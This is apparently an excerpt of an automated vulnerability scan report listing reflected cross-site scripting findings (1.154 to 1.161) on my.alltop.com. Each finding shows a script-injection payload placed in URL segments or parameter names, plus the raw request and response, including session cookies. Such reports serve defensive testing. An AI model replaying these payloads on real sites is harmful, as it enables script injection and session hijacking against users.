Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3Ce7863"><script>alert(1)</script>40d22640f71/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.154. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4e2"><script>alert(1)</script>c550f6a6c78 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E2e4e2"><script>alert(1)</script>c550f6a6c78 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:15 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:15 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E2e4e2"><script>alert(1)</script>c550f6a6c78" method="post" accept-charset="utf-8">
...[SNIP]...

1.155. http://my.alltop.com/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ee1a"><script>alert(1)</script>fafa8b3c29d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E?5ee1a"><script>alert(1)</script>fafa8b3c29d=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:00 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:01 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:01 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D2)%3C/script%3E?5ee1a"><script>alert(1)</script>fafa8b3c29d=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.156. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%22ns=%22netsparker(0x0001D9)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa1d5"><script>alert(1)</script>ea17928c2a6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ifa1d5"><script>alert(1)</script>ea17928c2a6/%22ns=%22netsparker(0x0001D9) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:12 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ifa1d5"><script>alert(1)</script>ea17928c2a6/%22ns=%22netsparker(0x0001D9)" method="post" accept-charset="utf-8">
...[SNIP]...

1.157. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%22ns=%22netsparker(0x0001D9)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5f23"><script>alert(1)</script>228c994bc6e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%22nsa5f23"><script>alert(1)</script>228c994bc6e=%22netsparker(0x0001D9) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:13 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%22nsa5f23"><script>alert(1)</script>228c994bc6e=%22netsparker(0x0001D9)" method="post" accept-charset="utf-8">
...[SNIP]...

1.158. http://my.alltop.com/alpha/i/%22ns=%22netsparker(0x0001D9) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%22ns=%22netsparker(0x0001D9)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5b30"><script>alert(1)</script>48d2acbcfe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%22ns=%22netsparker(0x0001D9)?e5b30"><script>alert(1)</script>48d2acbcfe1=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%22ns=%22netsparker(0x0001D9)?e5b30"><script>alert(1)</script>48d2acbcfe1=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.159. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a0b"><script>alert(1)</script>e73716bb60f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/ic4a0b"><script>alert(1)</script>e73716bb60f/%2522ns%253D%2522netsparker%25280x0001E2%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:10 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:10 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:11 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:11 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/ic4a0b"><script>alert(1)</script>e73716bb60f/%2522ns%253D%2522netsparker%25280x0001E2%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.160. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ab8"><script>alert(1)</script>cd321978f42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)40ab8"><script>alert(1)</script>cd321978f42 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:11 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:11 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:12 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:12 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)40ab8"><script>alert(1)</script>cd321978f42" method="post" accept-charset="utf-8">
...[SNIP]...

1.161. http://my.alltop.com/alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529) [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bb98"><script>alert(1)</script>dcc1bc07c78 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/i/%2522ns%253D%2522netsparker%25280x0001E2%2529)?2bb98"><script>alert(1)</script>dcc1bc07c78=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
